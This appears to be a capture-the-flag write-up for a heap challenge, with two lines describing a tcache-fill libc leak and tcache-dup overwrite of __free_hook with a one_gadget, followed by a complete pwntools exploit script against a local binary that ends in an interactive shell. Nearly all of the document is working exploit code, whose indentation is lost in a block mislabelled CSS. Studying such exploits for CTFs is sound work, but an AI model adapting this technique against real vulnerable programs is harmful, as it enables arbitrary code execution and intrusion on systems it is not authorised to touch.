Fill, Tcache wiith 7 frees, 8th free gets into Unsortedbin :- Get's you libc leak

Normal tcache-dup to overwrite __free_hook with one_gadget

```CSS
#!/usr/bin/python

from pwn import *

context(os='linux',arch='amd64')
context.log_level = 'DEBUG'
context(terminal=['tmux','new-window'])

p = process('./chall')
#p = gdb.debug('./chall','c')
e = ELF('./chall')
libc = ELF('./libc.so.6')

def prefix(ch):
p.recvuntil(">> ")
p.sendline(str(ch))

def add(size,data):
prefix(1)
prefix(size)
prefix(data)

def view(index):
prefix(2)
prefix(index)

def delete(index):
prefix(3)
prefix(index)

def exploit():
add(150,"AAA")
add(40,"AAA")

for i in range(8):
delete(0)

view(0)

p.recvline()
libc.address = u64(p.recvline().strip().ljust(8,'\x00')) - (libc.symbols['__malloc_hook'] + 112)

for i in range(2):
delete(1)

add(40,p64(libc.symbols['__free_hook']))
add(40,p64(0))
add(40,p64(0x4f3c2 + libc.address))

delete(0)

exploit()
context.log_level = 'INFO'

p.interactive()
```